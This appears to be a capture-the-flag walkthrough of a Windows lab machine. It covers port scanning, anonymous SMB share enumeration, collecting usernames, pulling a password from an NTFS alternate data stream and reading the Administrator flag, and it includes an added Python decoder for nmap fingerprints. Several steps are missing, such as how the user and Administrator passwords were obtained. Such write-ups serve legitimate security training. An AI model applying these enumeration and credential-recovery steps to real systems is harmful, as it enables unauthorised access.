```
$ sudo nmap -sS -p- 10.10.10.178 -o nmap_ports
[sudo] password for noraj:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-23 21:05 CET
Stats: 0:04:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.81% done; ETC: 21:19 (0:10:03 remaining)
Nmap scan report for 10.10.10.178
Host is up (0.051s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
4386/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 543.24 seconds
```
```
$ sudo nmap -sSVC -p 445,4386 10.10.10.178 -o nmap_services
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-23 21:24 CET
Stats: 0:02:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 21:28 (0:02:02 remaining)
Nmap scan report for 10.10.10.178
Host is up (0.031s latency).

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     --- AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=3/23%Time=5E791B05%P=x86_64-unknown-linux-gnu
SF:%r(NULL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Gener
SF:icLines,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnreco
SF:gnised\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Servi
SF:ce\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
SF:command\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\
SF:.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x2
SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP
SF:,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20al
SF:lows\x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\
SF:x20the\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x
SF:20---\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_I
SF:D>\r\nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,2
SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer
SF:Cookie,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSes
SF:sionReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerbe
SF:ros,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNe
SF:g,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourReque
SF:st,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1
SF:\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nH
SF:QK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.45 seconds
```
So we have SMBv2 on 445 and an unknown service on port 4386 that announces itself as "HQK Reporting Service V1.2" and exposes a small command set (LIST, SETDIR, RUNQUERY, DEBUG, HELP). The DEBUG <Password> command is worth remembering.
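The SF fingerprint above is what nmap would submit to its database, and it is hard to read by eye. The following is an added example (mine, not code from the original write-up nor from nmap) that decodes such a fingerprint offline: it re-joins the SF: continuation lines, undoes nmap's escaping, checks every probe's declared hex length against the decoded bytes (a quick way to tell whether a fingerprint copied through a web page survived intact), and pulls the banner and the advertised command list out of the Help probe. The embedded fingerprint is copied from the scan above, trimmed to the NULL, GenericLines and Help probes and re-wrapped at different points; the parser tolerates that because it joins the lines before parsing.

```python
"""Decode an nmap service fingerprint (the SF-Port... block) offline.

Added example, not part of the original write-up. FINGERPRINT is copied from
the scan above, trimmed to three probes and re-wrapped by me.
"""
from __future__ import annotations

import re

FINGERPRINT = r"""
SF-Port4386-TCP:V=7.80%I=7%D=3/23%Time=5E791B05%P=x86_64-unknown-linux-gnu
SF:%r(NULL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")
SF:%r(GenericLines,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\n
SF:Unrecognised\x20command\r\n>")
SF:%r(Help,F2,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20
SF:service\x20allows\x20users\x20to\x20run\x20queries\x20against\x20databases
SF:\x20using\x20the\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20
SF:COMMANDS\x20---\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20
SF:<Query_ID>\r\nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>");
"""

# One probe record looks like: %r(ProbeName,HexLength,"escaped response")
_PROBE_RE = re.compile(r'%r\(([\w-]+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
# Header: SF-Port<port>-<proto>:<%-separated key=value fields> up to the first probe
_HEADER_RE = re.compile(r"^SF-Port(\d+)-(\w+):(.*?)(?=%r\()", re.S)
_SIMPLE_ESCAPES = {"r": 0x0D, "n": 0x0A, "t": 0x09}


def decode_response(escaped: str) -> bytes:
    """Turn nmap's escaped response text back into the bytes the service sent.

    nmap writes bytes as \\r, \\n, \\t or \\xHH and backslash-escapes regex
    metacharacters (the "\\." in V1\\.2) because match lines are regexes;
    an escaped metacharacter simply stands for itself.
    """
    out = bytearray()
    i = 0
    while i < len(escaped):
        ch = escaped[i]
        if ch != "\\":
            out.append(ord(ch))
            i += 1
            continue
        if i + 1 >= len(escaped):
            raise ValueError("dangling backslash at end of response")
        nxt = escaped[i + 1]
        if nxt == "x":
            out.append(int(escaped[i + 2 : i + 4], 16))
            i += 4
        elif nxt in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[nxt])
            i += 2
        else:
            out.append(ord(nxt))
            i += 2
    return bytes(out)


def parse_fingerprint(text: str) -> dict:
    """Parse a fingerprint into header fields and per-probe raw responses.

    The declared hex length of each probe is compared with the decoded
    response; a mismatch means the fingerprint was damaged on its way here.
    """
    lines = [ln.strip() for ln in text.strip().splitlines()]
    joined = lines[0]
    for ln in lines[1:]:
        if not ln.startswith("SF:"):
            raise ValueError(f"not a continuation line: {ln!r}")
        joined += ln[3:]
    head = _HEADER_RE.match(joined)
    if head is None:
        raise ValueError("missing SF-Port header")
    port, proto, fields = head.groups()
    header = dict(f.split("=", 1) for f in fields.split("%") if f)
    probes: dict[str, bytes] = {}
    length_ok: dict[str, bool] = {}
    for name, hexlen, body in _PROBE_RE.findall(joined):
        raw = decode_response(body)
        probes[name] = raw
        length_ok[name] = len(raw) == int(hexlen, 16)
    return {"port": int(port), "proto": proto, "header": header,
            "probes": probes, "length_ok": length_ok}


def service_banner(response: bytes) -> str:
    """First non-empty line of a response: what the service calls itself."""
    return response.decode("ascii", "replace").strip().splitlines()[0]


def help_commands(help_response: bytes) -> list[str]:
    """Commands advertised after the '--- AVAILABLE COMMANDS ---' marker."""
    text = help_response.decode("ascii", "replace")
    _, _, tail = text.partition("--- AVAILABLE COMMANDS ---")
    return [ln for ln in tail.split("\r\n") if ln and ln != ">"]


if __name__ == "__main__":
    fp = parse_fingerprint(FINGERPRINT)
    print(f"port {fp['port']}/{fp['proto']}, nmap {fp['header']['V']}")
    for name, raw in fp["probes"].items():
        flag = "" if fp["length_ok"][name] else "  (LENGTH MISMATCH)"
        print(f"{name:<13} {len(raw):>4} bytes{flag}")
    print("banner  :", service_banner(fp["probes"]["NULL"]))
    print("commands:", help_commands(fp["probes"]["Help"]))
```

The length check is the useful part when you inherit a fingerprint from someone else's notes: a single dropped `SF:` line or a space inserted by a HTML renderer shows up as a mismatch on the affected probe instead of silently producing a wrong banner.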
CrackMapExec, smb-enum-shares.nse and enum4linux don't find any shares because they only speak SMB v1, which is disabled on the target.
But smbclient and the msf modules work. So let's start the metasploit console (msfconsole).
```
[+] 10.10.10.178:445      - 10.10.10.178 supports SMB 2 [dialect 255.2] and has been online for 1 hours
[*] 10.10.10.178:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
I found a few SMBv2 shares with metasploit but we can do the same thing
with smbclient.
BlackArch: pacman -S smbclient
```
$ smbclient -L 10.10.10.178 -N
Unable to initialize messaging context

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Data            Disk
	IPC$            IPC       Remote IPC
	Secure$         Disk
	Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.178 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
```
We can connect anonymously to the Users share. Listing the contents of the home folders is denied, but the folder names themselves are returned, which gives us a list of usernames:
```
$ smbclient -N \\\\10.10.10.178\\Users
Unable to initialize messaging context
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Administrator\*
NT_STATUS_ACCESS_DENIED listing \C.Smith\*
NT_STATUS_ACCESS_DENIED listing \L.Frost\*
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*
NT_STATUS_ACCESS_DENIED listing \TempUser\*
```
This way we found 5 users: Administrator, C.Smith, L.Frost, R.Thompson and TempUser.
For now we can't look inside the Secure$ share. Note that the error below is NT_STATUS_BAD_NETWORK_NAME rather than NT_STATUS_ACCESS_DENIED: the share is called Secure$ (the trailing $ marks a hidden share), and the name Secure without it simply doesn't exist on the server.
```
$ smbclient -N \\\\10.10.10.178\\Secure
Unable to initialize messaging context
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
```
By enumerating the Data share we find some interesting files. Again the IT, Production and Reports folders are denied to an anonymous user, but everything under Shared is readable:
```
$ smbclient -N \\\\10.10.10.178\\Data
Unable to initialize messaging context
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \IT\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Reports\*
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0,4 KiloBytes/sec) (average 0,4 KiloBytes/sec)
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0,5 KiloBytes/sec) (average 0,5 KiloBytes/sec)
```
By reading the welcome email template we find a generic account handed out to new employees:
```
$ cat smb/Shared/Templates/HR/Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.
```
The RU Scanner password is stored encrypted, but pasting the ciphertext
fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= into a search engine turns up
code snippets that are able to decrypt it.
Inside the Users share, in the C.Smith folder, there are files related to the
HQK Reporting software.
There is a promising Debug Mode Password.txt, but its size is 0 bytes.
On NTFS this is a hint that an ADS (Alternate Data Stream) may be in use: the
size shown by a directory listing only counts the unnamed ::$DATA stream, while
data stored in a named stream is invisible to a plain ls. smbclient's allinfo
command lists every stream of a file. As you can see below, the default $DATA
stream is 0 bytes while an alternate stream named Password is 15 bytes, so we
can download the content by requesting the non-default stream with the
file:stream:$DATA syntax.
```
$ smbclient \\\\10.10.10.178\\Users -U 'c.smith'
Unable to initialize messaging context
Enter WORKGROUP\c.smith's password:
Try "help" to get a list of possible commands.
smb: \> cd "C.Smith\HQK Reporting"
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Fri Aug  9 01:06:12 2019 CEST
access_time:    Fri Aug  9 01:06:12 2019 CEST
write_time:     Fri Aug  9 01:08:17 2019 CEST
change_time:    Fri Aug  9 01:08:17 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$DATA"
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password:$DATA of size 15 as Debug Mode Password.txt:Password:$DATA (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\>
```
This stream holds the password for the DEBUG command of the HQK Reporting Service seen on port 4386.
Let's get the root flag via the C$ share with the Administrator account:
```
$ smbclient '\\10.10.10.178\C$' -U 'Administrator'
Unable to initialize messaging context
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 08:20:50 2020
  ..                                 DR        0  Sun Jan 26 08:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 23:02:44 2020
  root.txt                            A       32  Tue Aug  6 00:27:26 2019

		10485247 blocks of size 4096. 6545277 blocks available
smb: \Users\Administrator\Desktop\> mget root.txt
Get file root.txt? y
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)
```